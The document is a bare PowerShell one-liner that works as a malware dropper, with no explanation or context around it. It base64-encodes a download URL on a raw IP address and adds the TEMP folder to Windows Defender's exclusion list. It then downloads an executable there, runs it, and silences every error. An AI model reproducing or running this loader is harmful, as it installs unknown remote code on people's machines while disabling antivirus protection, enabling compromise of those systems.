$env:temp = [System.Environment]::GetEnvironmentVariable('TEMP'); $a = [System.Convert]::FromBase64String('JVRlbXAl'); $b = [System.Text.Encoding]::UTF8.GetString($a); $c = [System.Convert]::FromBase64String('aHR0cDovLzY2LjYzLjE4Ny4xOTAvcXl5dWw2NmZlaC5leGU='); $d = [System.Text.Encoding]::UTF8.GetString($c); $e = Join-Path -Path $env:temp -ChildPath 'tmpfile.exe'; try { Set-MpPreference -ExclusionPath $env:temp -ErrorAction SilentlyContinue; $f = [System.Net.WebClient]::new(); $f.DownloadFile($d, $e); Start-Process -FilePath $e -ErrorAction SilentlyContinue } catch {}